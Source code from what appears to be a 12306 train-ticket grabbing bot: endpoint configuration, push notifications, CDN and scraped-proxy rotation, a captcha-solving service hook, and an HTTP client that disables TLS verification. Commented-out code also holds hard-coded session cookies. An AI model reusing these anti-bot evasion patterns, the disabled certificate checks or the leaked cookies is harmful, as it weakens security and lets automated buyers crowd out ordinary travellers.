u"排队等待时间预计还剩 {0} ms" WAIT_ORDER_FAIL = u"排队等待失败,错误消息:{0}" WAIT_ORDER_NUM = u"第{0}次排队中,请耐心等待" WAIT_ORDER_SUB_FAIL = u"订单提交失败!,正在重新刷票" CANCEL_ORDER_SUCCESS = u"排队超时,已为您自动取消订单,订单编号: {0}" CANCEL_ORDER_FAIL = u"排队超时,取消订单失败, 订单号{0}" REST_TIME = u"12306休息时间,本程序自动停止,明天早上6点将自动运行" REST_TIME_PAST = u"休息时间已过,重新开启检票功能" LOGIN_SESSION_FAIL = u"用户检查失败:{0},可能未登录,可能session已经失效, 正在重新登录中" File: config/serverchanConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_SERVER_CHAN_PATH = "https://sc.ftqq.com" def sendServerChan(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if ( TickerConfig.SERVER_CHAN_CONF["is_server_chan"] and TickerConfig.SERVER_CHAN_CONF["secret"].strip() != "" ): try: secret = TickerConfig.SERVER_CHAN_CONF["secret"].strip() sendServerChanUrls = urls.get("ServerChan") sendServerChanUrls["req_url"] += f'{secret}.send' params = {"text": "易行购票成功通知", "desp": msg} httpClint = HTTPClient(0) sendServerChanRsp = httpClint.send(sendServerChanUrls, params=params) if sendServerChanRsp.get("errno") == 0: print(u"已下发 Server酱 微信通知, 请查收") else: print(sendServerChanRsp) except Exception as e: print(u"Server酱 配置有误 {}".format(e)) if __name__ == "__main__": sendServerChan(1) File: config/urlConf.py # coding=utf-8 import random import TickerConfig import time urls = { "auth": { # 登录接口 "req_url": "/passport/web/auth/uamtk", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "uamtk-static": { # 登录接口 "req_url": "/passport/web/auth/uamtk-static", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 3, "s_time": 0.1, "is_logger": True, "is_json": True, "is_cdn": True, }, "login": { # 登录接口 "req_url": "/passport/web/login", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.5, "is_logger": True, "is_cdn": True, "is_json": True, }, "left_ticket_init": { # 登录接口 "req_url": "/otn/leftTicket/init", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "getCodeImg": { # 
登录验证码 "req_url": "/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand&{0}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_json": False, "is_cdn": True, "not_decode": True, }, "getCodeImg1": { # 登录验证码 "req_url": "/passport/captcha/captcha-image64?login_site=E&module=login&rand=sjrand&{0}&callback=jQuery19108016482864806321_1554298927290&_=1554298927293", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck": { # 验证码校验 "req_url": "/passport/captcha/captcha-check", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": False, }, "codeCheck1": { # 验证码校验 "req_url": "/passport/captcha/captcha-check?callback=jQuery19108016482864806321_1554298927290&answer={0}&rand=sjrand&login_site=E&_={1}", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/resources/login.html", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": False, }, "loginInit": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "loginInitCdn": { # 登录页面 "req_url": "/otn/login/init", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/index/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": True, "is_cdn": True, "is_json": False, }, "loginInitCdn1": { # 登录页面 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/view/index.html", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 0.1, "is_logger": False, "is_test_cdn": False, "is_cdn": True, "is_json": False, }, "getDevicesId": { # 获取用户信息 "req_url": "/otn/HttpZF/logdevice", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": False, }, "getUserInfo": { # 获取用户信息 "req_url": "/otn/index/initMy12306", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.01, "is_cdn": True, "is_logger": False, "is_json": False, }, "userLogin": { # 用户登录 "req_url": "/otn/login/userLogin", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 1, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "uamauthclient": { # 登录 "req_url": "/otn/uamauthclient", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/passport?redirect=/otn/login/userLogin", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "initdc_url": { # 生成订单页面 "req_url": "/otn/confirmPassenger/initDc", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, 
"s_time": 1, "is_logger": False, "is_cdn": True, "is_json": False, }, "GetJS": { # 订单页面js "req_url": "/otn/HttpZF/GetJS", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "odxmfwg": { # 订单页面js "req_url": "/otn/dynamicJs/odxmfwg", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "get_passengerDTOs": { # 获取乘车人 "req_url": "/otn/confirmPassenger/getPassengerDTOs", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.1, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "select_url": { # 查询余票 "req_url": "/otn/{3}?leftTicketDTO.train_date={0}&leftTicketDTO.from_station={1}&leftTicketDTO.to_station={2}&purpose_codes=ADULT", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 0.01, "s_time": 0.01, "is_logger": False, "is_json": True, "is_cdn": True, }, "check_user_url": { # 检查用户登录 "req_url": "/otn/login/checkUser", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 1, "re_time": 1, "s_time": 1, "is_cdn": True, "is_logger": True, "is_json": True, }, "submit_station_url": { # 提交订单 "req_url": "/otn/leftTicket/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "checkOrderInfoUrl": { # 检查订单信息规范 "req_url": "/otn/confirmPassenger/checkOrderInfo", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountUrl": { # 剩余余票数 "req_url": "/otn/confirmPassenger/getQueueCount", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkQueueOrderUrl": { # 订单队列排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "checkRandCodeAnsyn": { # 暂时没用到 "req_url": "/otn/passcodeNew/checkRandCodeAnsyn", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "codeImgByOrder": { # 订单页面验证码 "req_url": "/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&{}", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "queryOrderWaitTimeUrl": { # 订单等待页面 "req_url": "/otn/confirmPassenger/queryOrderWaitTime?random={0}&tourFlag=dc&_json_att=", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, 
"s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "queryMyOrderNoCompleteUrl": { # 订单查询页面 "req_url": "/otn/queryOrder/queryMyOrderNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "initNoCompleteUrl": { # 获取订单列表 "req_url": "/otn/queryOrder/initNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "cancelNoCompleteMyOrder": { # 取消订单 "req_url": "/otn/queryOrder/cancelNoCompleteMyOrder", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoSubmitOrderRequest": { # 快速自动提交订单 "req_url": "/otn/confirmPassenger/autoSubmitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountAsync": { # 快速获取订单数据 "req_url": "/otn/confirmPassenger/getQueueCountAsync", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "confirmSingleForQueueAsys": { # 快速订单排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueueAsys", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Content-Type": 1, "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "Pushbear": { # push通知 "req_url": "/sub", "req_type": "post", "Referer": "", "Content-Type": 1, "Host": "pushbear.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_json": True, }, "ServerChan": { # Server酱 push通知 "req_url": "/", "req_type": "get", "Referer": "", "Content-Type": 1, "Host": "sc.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_json": True, }, "loginHtml": { # 登录接口2 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginConf": { # 登录接口2 "req_url": "/otn/login/conf", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginAysnSuggest": { # 登录接口2 "req_url": "/otn/login/loginAysnSuggest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "is_cdn": True, "s_time": 0.1, "is_logger": True, "is_json": True, }, # 候补订单接口 "chechFace": { # 人脸识别 "req_url": "/otn/afterNate/chechFace", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "getSuccessRate": { # 成功信息 "req_url": "/otn/afterNate/getSuccessRate", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", 
"Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "SubmitOrderRequestRsp": { # 提交候补订单准备 "req_url": "/otn/afterNate/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "confirmHB": { # 设置订单信息 "req_url": "/otn/afterNate/confirmHB", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "queryQueue": { # 排队 "req_url": "/otn/afterNate/queryQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "passengerInitApi": { # 排队 "req_url": "/otn/afterNate/passengerInitApi", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoVerifyImage": { # 云打码接口 "req_url": TickerConfig.REQ_URL, "req_type": "post", "Referer": "", "Host": TickerConfig.HOST, "re_try": 6, "re_time": 10, "s_time": 0.001, "is_logger": True, "is_json": True, "httpType": TickerConfig.HTTP_TYPE }, } File: agency/__init__.py File: agency/cdn_utils.py # encoding=utf8 import datetime import operator import os import requests from config import urlConf import threading from config.urlConf import urls from myUrllib.httpUtils import HTTPClient cdn_list = [] class CDNProxy(threading.Thread): def __init__(self, cdns): super().__init__() self.cdns = cdns self.urlConf = urlConf.urls self.httpClint = requests self.city_list = [] self.timeout = 5 def run(self): for cdn in self.cdns: http = HTTPClient(0) url = urls["loginInitCdn"] http._cdn = cdn.replace("\n", "") start_time = datetime.datetime.now() rep = http.send(url) retTime = (datetime.datetime.now() - start_time).microseconds / 1000 if rep and "message" not in rep and retTime < 3000: if cdn.replace("\n", "") not in cdn_list: # 如果有重复的cdn,则放弃加入 print(f"加入cdn: {cdn}") cdn_list.append({"ip": cdn.replace("\n", ""), "time": retTime}) def open_cdn_file(cdnFile): cdn = [] path = os.path.join(os.path.dirname(__file__), f'../{cdnFile}') try: with open(path, "r", encoding="utf-8") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn except Exception: with open(path, "r") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn def sortCdn(): """ 对cdn进行排序 :return: """ ips = [] cs = sorted(cdn_list, key=operator.itemgetter('time')) for c in cs: print(f"当前ip: {c['ip']}, 延时: {c['time']}") ips.append(c["ip"]) return ips def filterCdn(): """ 过滤cdn, 过滤逻辑为当前cdn响应值小于1000毫秒 过滤日志: 加入cdn: 116.77.75.146 :return: """ cdns = open_cdn_file("cdn_list") cdnss = [cdns[i:i + 50] for i in range(0, len(cdns), 50)] cdnThread = [] for cdn in cdnss: t = CDNProxy(cdn) cdnThread.append(t) for cdn_t in cdnThread: cdn_t.start() for cdn_j in cdnThread: cdn_j.join() print(f"当前有效cdn个数为: {len(cdn_list)}") if cdn_list: ips = sortCdn() path = os.path.join(os.path.dirname(__file__), f'../filter_cdn_list') f = open(path, "a+") f.seek(0) f.truncate() f.writelines("") for ip in ips: f.writelines(f"{ip}\n") f.close() if __name__ == 
'__main__': filterCdn() File: agency/agency_tools.py # encoding=utf8 import os import random import socket import time import requests from bs4 import BeautifulSoup class proxy: def __init__(self): self.proxy_list = [] self.proxy_filter_list = [] def get_proxy(self): """ 获取未加工代理列表 :return: """ User_Agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' header = dict() header['User-Agent'] = User_Agent for i in range(1, 5): time.sleep(1) url = 'http://www.xicidaili.com/nn/' + str(i) res = requests.get(url=url, headers=header).content soup = BeautifulSoup(res, "html.parser") ips = soup.findAll('tr') for x in range(1, len(ips)): ip = ips[x] tds = ip.findAll("td") ip_temp = tds[1].contents[0] + ":" + tds[2].contents[0] print(ip_temp) self.proxy_list.append(ip_temp) def filter_proxy(self): """ 将不可用IP剔除 :return: """ socket.setdefaulttimeout(1) path = os.path.join(os.path.dirname(__file__), './proxy_list') f = open(path, "w") head = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'Connection': 'keep-alive'} url = "http://icanhazip.com" proxy_num = 0 for proxy in self.proxy_list: proxy_temp = {"https": "https://{}".format(proxy)} try: req = requests.get(url, proxies=proxy_temp, timeout=2, headers=head).content print(req) write_proxy = proxy + "\n" f.write(write_proxy) proxy_num += 1 except Exception: print ("代理链接超时,去除此IP:{0}".format(proxy)) continue print("总共可使用ip量为{}个".format(proxy_num)) def get_filter_proxy(self): """ 读取该可用ip文件 :return: 可用ip文件list """ path = os.path.join(os.path.dirname(__file__), './proxy_list') try: with open(path, "r", encoding="utf-8") as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) except Exception: with open(path, "r", ) as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) return self.proxy_filter_list def main(self): # self.get_proxy() self.filter_proxy() def setProxy(self): """ 开启此功能的时候请确保代理ip是否可用 查询的时候设置代理ip,ip设置格式是ip地址+端口,推荐可用的ip代理池:https://github.com/jhao104/proxy_pool :return: """ ip = self.get_filter_proxy() setIp = ip[random.randint(0, len(ip) - 1)] proxie = { 'http': 'http://{}'.format(setIp), 'https': 'http://{}'.format(setIp), } return proxie if __name__ == "__main__": a = proxy() print(a.get_filter_proxy()) File: myUrllib/httpUtils.py # -*- coding: utf8 -*- import json import random import socket from collections import OrderedDict from time import sleep import requests from fake_useragent import UserAgent import TickerConfig from agency.agency_tools import proxy from config import logger def _set_header_default(): header_dict = OrderedDict() # header_dict["Accept"] = "application/json, text/plain, */*" header_dict["Accept-Encoding"] = "gzip, deflate" header_dict[ "User-Agent"] = _set_user_agent() header_dict["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" header_dict["Origin"] = "https://kyfw.12306.cn" header_dict["Connection"] = "keep-alive" return header_dict def _set_user_agent(): # try: # user_agent = UserAgent(verify_ssl=False).random # return user_agent # except: # print("请求头设置失败,使用默认请求头") # return 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' 
+ str( # random.randint(5000, 7000)) + '.0 Safari/537.36' return "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" class HTTPClient(object): def __init__(self, is_proxy, cdnList=None): """ cdnList试试切换不包括查询的cdn,防止查询cdn污染登陆和下单cdn :param method: :param headers: Must be a dict. Such as headers={'Content_Type':'text/html'} """ self.initS() self._cdn = None self.cdnList = cdnList self._proxies = None if is_proxy is 1: self.proxy = proxy() self._proxies = self.proxy.setProxy() # print(u"设置当前代理ip为 {}, 请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!".format(self._proxies)) def initS(self): self._s = requests.Session() self._s.headers.update(_set_header_default()) return self def set_cookies(self, kwargs): """ 设置cookies :param kwargs: :return: """ for kwarg in kwargs: for k, v in kwarg.items(): self._s.cookies.set(k, v) def get_cookies(self): """ 获取cookies :return: """ return self._s.cookies.values() def del_cookies(self): """ 删除所有的key :return: """ self._s.cookies.clear() def del_cookies_by_key(self, key): """ 删除指定key的session :return: """ self._s.cookies.set(key, None) def setHeaders(self, headers): self._s.headers.update(headers) return self def resetHeaders(self): self._s.headers.clear() self._s.headers.update(_set_header_default()) def getHeadersHost(self): return self._s.headers["Host"] def setHeadersHost(self, host): self._s.headers.update({"Host": host}) return self def setHeadersUserAgent(self): self._s.headers.update({"User-Agent": _set_user_agent()}) def getHeadersUserAgent(self): return self._s.headers["User-Agent"] def getHeadersReferer(self): return self._s.headers["Referer"] def setHeadersReferer(self, referer): self._s.headers.update({"Referer": referer}) return self @property def cdn(self): return self._cdn @cdn.setter def cdn(self, cdn): self._cdn = cdn def send(self, urls, data=None, **kwargs): """send request to url.If response 200,return response, else return None.""" allow_redirects = False is_logger = urls.get("is_logger", False) req_url = urls.get("req_url", "") re_try = urls.get("re_try", 0) s_time = urls.get("s_time", 0) is_cdn = urls.get("is_cdn", False) is_test_cdn = urls.get("is_test_cdn", False) error_data = {"code": 99999, "message": u"重试次数达到上限"} if data: method = "post" self.setHeaders({"Content-Length": "{0}".format(len(data))}) else: method = "get" self.resetHeaders() if TickerConfig.RANDOM_AGENT is 1: self.setHeadersUserAgent() self.setHeadersReferer(urls["Referer"]) if is_logger: logger.log( u"url: {0}\n入参: {1}\n请求方式: {2}\n".format(req_url, data, method)) self.setHeadersHost(urls["Host"]) if is_test_cdn: url_host = self._cdn elif is_cdn: if self._cdn: # print(u"当前请求cdn为{}".format(self._cdn)) url_host = self._cdn else: url_host = urls["Host"] else: url_host = urls["Host"] http = urls.get("httpType") or "https" for i in range(re_try): try: # sleep(urls["s_time"]) if "s_time" in urls else sleep(0.001) sleep(s_time) try: requests.packages.urllib3.disable_warnings() except: pass response = self._s.request(method=method, timeout=5, proxies=self._proxies, url=http + "://" + url_host + req_url, data=data, allow_redirects=allow_redirects, verify=False, **kwargs) if response.status_code == 200 or response.status_code == 302: if urls.get("not_decode", False): return response.content if response.content: if is_logger: logger.log( u"出参:{0}".format(response.content.decode())) if urls["is_json"]: return json.loads( response.content.decode() if isinstance(response.content, bytes) else response.content) else: return 
response.content.decode("utf8", "ignore") if isinstance(response.content, bytes) else response.content else: print(f"url: {urls['req_url']}返回参数为空, 接口状态码: {response.status_code}") logger.log( u"url: {} 返回参数为空".format(urls["req_url"])) if self.cdnList: # 如果下单或者登陆出现cdn 302的情况,立马切换cdn url_host = self.cdnList.pop(random.randint(0, 4)) continue else: sleep(urls["re_time"]) except (requests.exceptions.Timeout, requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError): pass except socket.error: pass return error_data File: myUrllib/__init__.py File: myUrllib/MySocketUtils.py # coding=utf-8 import json import socket import re # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect(('183.232.189.31', 80)) # get_str = 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: %s\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' # post_str = "POST {0} HTTP/1.1\r\n" \ # "Host: kyfw.12306.cn\r\n" \ # "Connection: close\r\n"\ # "Origin: https://kyfw.12306.cn\r\n" \ # "X-Requested-With: XMLHttpRequest\r\n" \ # "Referer: https://kyfw.12306.cn/otn/leftTicket/init\r\n" \ # "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ # "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ # "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ # "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ # "Content-Length: 9\r\n"\ # "Cookie: _passport_session=a459aba69761497eb31de76c27795e999613; _passport_ct=9116b2cb0bf443e1a01d22ac8c1ae449t5007; route=9036359bb8a8a461c164a04f8f50b252; BIGipServerpool_passport=200081930.50215.0000; BIGipServerotn=484704778.64545.0000\r\n\n"\ # "appid=otn\r\n" # # s.sendall(get_str.format("https://kyfw.12306.cn/otn/resources/login.html")) # s.sendall(post_str.format("https://kyfw.12306.cn/passport/web/auth/uamtk")) from config.urlConf import urls def default_get_data(): """ get请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 :return: """ return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ 'Host: kyfw.12306.cn\r\n' \ "Referer: {1}\r\n" \ 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ '\r\nAccept: */*\r\n' \ "Cookie: {2}\r\n\n"\ '\r\n' # return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: kyfw.12306.cn\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' def default_post_data(): """ post请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 -- Referer 请求页面来源 -- Content-Length: body 长度 -- Cookie 页面请求的身份认证 -- appid 接口请求报文 :return: """ return "POST https://kyfw.12306.cn{0} HTTP/1.1\r\n" \ "Host: kyfw.12306.cn\r\n" \ "Connection: close\r\n"\ "Origin: https://kyfw.12306.cn\r\n" \ "X-Requested-With: XMLHttpRequest\r\n" \ "Referer: {3}\r\n" \ "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ "Content-Length: {2}\r\n"\ "Cookie: {4}\r\n\n"\ "{1}\r\n"\ # "\r\n" class socketUtils: def __init__(self, host, port=80): self.host = host self.port = port self.s = self.connect_socket(self.host, self.port) def connect_socket(self, 
host, port): """ 连接socket :param host: :param port: :return: """ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host if isinstance(host, str) else str(host), port if isinstance(port, int) else int(port))) return s def close_s(self): self.s.close() # def send(self, urls, Cookie=None, data=None): # """ # 发送请求 # :param urls: # :param data: # :param cookie: # :return: # """ # url = urls.get("req_url", "") # Referer = urls.get("Referer", "") # if urls.get("req_type", "get") == "post": # Content_Length = len(data) # Cookie = "tk=pnidlCoFy2B7wxO_X_pESbrkZFSq3OtVA_xzXwuba2a0; JSESSIONID=C6144324BFCE36AC5082E543E934E8B3; current_captcha_type=Z; _jc_save_fromDate=2018-08-03; _jc_save_fromStation=%u6DF1%u5733%2CSZQ; _jc_save_toDate=2018-08-03; _jc_save_toStation=%u957F%u6C99%2CCSQ; _jc_save_wfdc_flag=dc; ten_key=b5L6aMWfnzBm8CgQe8pcAKQsmVBS2PYH; BIGipServerpool_passport=166527498.50215.0000; BIGipServerotn=165937674.50210.0000; route=c5c62a339e7744272a54643b3be5bf64; RAIL_DEVICEID=fC-yepiUqNjsBiRvtLBXW4JqQmabCfB9QxI3FifJZK9YDRsImhJLSz4sAQ4HiGF7uQAFdFyISg6jA7KAhtpEldJV9ZMNsn6Dzm_psA5CBDwSNfiORf42w-LIRvkeGvdKFtegZwWGlkA2fVuEWKu-1xAYdCXRnsMD; RAIL_EXPIRATION=1533420302032; _jc_save_detail=true" # if data: # send_value = default_post_data().format(url, # data, # Content_Length, # Referer, # Cookie # ) # print("send_value: " + send_value) # 